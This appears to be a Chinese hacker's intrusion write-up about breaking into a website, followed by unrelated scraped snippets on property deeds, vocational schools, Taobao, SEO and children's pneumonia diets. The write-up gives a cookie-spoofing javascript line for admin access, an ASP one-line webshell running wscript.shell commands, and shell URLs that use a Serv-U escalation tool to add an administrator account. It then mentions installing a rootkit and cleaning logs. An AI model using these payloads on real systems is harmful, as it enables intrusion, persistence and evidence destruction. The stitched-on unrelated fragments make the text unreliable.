DB_OWNER权限,SQL Server禁止多句执行(偶就不能通过WEB方式备份得到shell了),开了3389(冲着它来的) 后台没什么功能,想放弃,可发现了下面的一幕 发现了一个计数器程序的readme http://www.abc.com/count/readme.txt 有说明就好办,从网上下了个源程序来 发现漏洞文件count/admin.asp代码如下 _____________________________________________________________ <% '****************************** ' ' 飞越访客单用户统计系统 ' 飞越 feiyueziwo@sohu.com ' www.pwsite.net ' ' 版权所有: 动力在线 ' '****************************** %> <% response.write Request.Cookies(feiyue)("Username") if Request.Cookies(feiyue)("Username")="" then response.end response.Redirect("login.asp?action=error") end if%> ........... _____________________________________________________________ cookies欺骗一句话就可以搞定 再IE里输入以下代码,再访问http://www.abc.com/count/admin.asp就是管理员了 javascript:document.cookie="feiyue=Username=cooldiyer"; 后台没什么可利用,郁闷,数据库插马本机测试可以成功,可它网站的不行,压缩了数据库还不行, 后台不能上传文件,只一个备份数据库功能,利用这个功能把数据库连接文件给显示了出来,得到 SQL Server连接用户和密码,远程连接后备份数据库log得到一个shell 主机开了Serv-U 6.2,上传Serv-U本地提权工具ftp.exe 写了一句话木马如下: <%=Server.CreateObject("wscript.shell").exec(request("cmd")).stdout.readall%> 执行: http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net user cooldiyer /add" http://www.abc.com/shell.asp?cmd=D:\www\ftp.exe "net localgroup administrators cooldiyer /add" 成功!连其3389端口,安上rootkit,CA一个管理员,CleanLog,闪人.......
相信现在有很多的朋友们对于房产证上可以写几个名字怎么分各位能否告知本人答案都想要了解吧,那么今天小编就来给大家针对房产证上可以写几个名字怎么分各位能否告知本人答案进行一个介绍吧,希望小编介绍的内容能够...
哪个新职业火了,职校就能快速对接“上新”专业吗?精准对接人才缺口,职业院校尚需找准坐标—— 【新业态新职业“喊渴”,人才培养如何破局?①】新职业来了,职校人才培养有些跟不上 开栏的话...
现在很多人都想做淘宝,认为淘宝现在还能赚钱,毕竟,身边还有朋友也是做这个的,一个月的收入也不少。但是现在大多数做淘宝的新人都是失败者,可以说100个赚钱成功的人中有一两个是失败者。为什么现在淘宝这么难...
网络黑客为何要进攻商业服务企业 qq相册图片电脑版网页登陆(电脑版qq相册图片) 低等网络黑客能够刷用什么软件 qq辅助材料验证失败(qq登录材料辅助验证) 变成一名网络黑客必须学...
如何做网站推广(具体方法有哪些?)摘要: 企业想要做好网站推广,做好内部网站优化外还要学会如何外部推广,友情链接和推广工具可以运营起来。想让网站推广达到理想结果常用方法有3种:1长尾关键词优化、2联...
. 孩子得了肺炎以后,在饮食上面要尤为注意,不要过于随便,反而加重宝宝的病情,好的饮食习惯对病情有事半功倍的效果,那么,小儿肺炎饮食要注意什么呢?接下来友谊长存小编就来说一说。 小儿肺炎饮食禁忌...